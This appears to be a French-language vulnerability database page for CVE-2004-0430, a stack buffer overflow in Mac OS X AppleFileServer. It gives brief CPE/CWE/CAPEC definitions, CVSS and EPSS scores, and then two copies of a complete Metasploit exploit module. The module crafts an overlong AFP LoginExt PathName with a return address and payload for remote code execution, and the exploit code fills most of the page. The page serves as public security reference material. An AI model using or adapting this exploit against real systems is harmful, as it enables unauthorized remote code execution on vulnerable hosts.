CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Stack-based buffer overflow in AppleFileServer for Mac OS X 10.3.3 and earlier allows remote attackers to execute arbitrary code via a LoginExt packet for a Cleartext Password User Authentication Method (UAM) request with a PathName argument that includes an AFPName type string that is longer than the associated length field.
Informations du CVE
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
5.1
AV:N/AC:H/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
70.81%
–
–
2023-03-12
–
–
–
11.23%
–
2023-04-16
–
–
–
12.53%
–
2023-11-12
–
–
–
10.57%
–
2024-01-28
–
–
–
10.57%
–
2024-06-02
–
–
–
10.57%
–
2024-12-22
–
–
–
43.35%
–
2025-03-02
–
–
–
43.35%
–
2025-03-09
–
–
–
46.96%
–
2025-01-19
–
–
–
43.35%
–
2025-03-09
–
–
–
46.96%
–
2025-03-18
–
–
–
–
80.15%
2025-03-18
–
–
–
–
80.15,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2010-09-19 22h00 +00:00 Auteur : Metasploit EDB Vérifié : Yes
##
# $Id: loginext.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'AppleFileServer LoginExt PathName Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the AppleFileServer service
on MacOS X. This vulnerability was originally reported by Atstake and
was actually one of the few useful advisories ever published by that
company. You only have one chance to exploit this bug.
This particular exploit uses a stack-based return address that will
only work under optimal conditions.
},
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Version' => '$Revision: 10394 $',
'References' =>
[
[ 'CVE', '2004-0430'],
[ 'OSVDB', '5762'],
[ 'BID', '10271'],
],
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00\x20",
'MinNops' => 128,
'Compat' =>
{
'ConnectionType' => "+find"
}
},
'Targets' =>
[
# Target 0
[
'Mac OS X 10.3.3',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
'Ret' => 0xf0101c0c # stack address :<
},
],
],
'DisclosureDate' => 'May 3 2004'))
# Configure the default port to be AFP
register_options(
[
Opt::RPORT(548),
], self.class)
end
def exploit
connect
print_status("Trying target #{target.name}...")
path = "\xff" * 1024
path[168, 4] = Rex::Arch.pack_addr(target.arch, target.ret)
path[172, payload.encoded.length] = payload.encoded
# The AFP header
afp = "\x3f\x00\x00\x00"
# Add the authentication methods
["AFP3.1", "Cleartxt Passwrd"].each { |m|
afp << [m.length].pack('C') + m
}
# Add the user type and afp path
afp << "\x03" + [9].pack('n') + rand_text_alphanumeric(9)
afp << "\x03" + [path.length].pack('n') + path
# Add the data stream interface header
dsi =
[
0, # Flags
2, # Command
rand(65536), # XID
0, # Data Offset
afp.length, # Data Length
0 # Reserved
].pack("CCnNNN") + afp
sock.put(dsi)
handler
disconnect
end
end
Date de publication : 2004-03-02 23h00 +00:00 Auteur : H D Moore EDB Vérifié : Yes
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'AppleFileServer LoginExt PathName Overflow',
'Description' => %q{
This module exploits a stack overflow in the AppleFileServer service
on MacOS X. This vulnerability was originally reported by Atstake and
was actually one of the few useful advisories ever published by that
company. You only have one chance to exploit this bug.
This particular exploit uses a stack-based return address that will
only work under optimal conditions.
},
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-0430'],
[ 'OSVDB', '5762'],
[ 'BID', '10271'],
],
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00\x20",
'MinNops' => 128,
'Compat' =>
{
'ConnectionType' => "+find"
}
},
'Targets' =>
[
# Target 0
[
'Mac OS X 10.3.3',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
'Ret' => 0xf0101c0c # stack address :<
},
],
],
'DisclosureDate' => 'May 3 2004'))
# Configure the default port to be AFP
register_options(
[
Opt::RPORT(548),
], self.class)
end
def exploit
connect
print_status("Trying target #{target.name}...")
path = "\xff" * 1024
path[168, 4] = Rex::Arch.pack_addr(target.arch, target.ret)
path[172, payload.encoded.length] = payload.encoded
# The AFP header
afp = "\x3f\x00\x00\x00"
# Add the authentication methods
["AFP3.1", "Cleartxt Passwrd"].each { |m|
afp << [m.length].pack('C') + m
}
# Add the user type and afp path
afp << "\x03" + [9].pack('n') + rand_text_alphanumeric(9)
afp << "\x03" + [path.length].pack('n') + path
# Add the data stream interface header
dsi =
[
0, # Flags
2, # Command
rand(65536), # XID
0, # Data Offset
afp.length, # Data Length
0 # Reserved
].pack("CCnNNN") + afp
sock.put(dsi)
handler
disconnect
end
end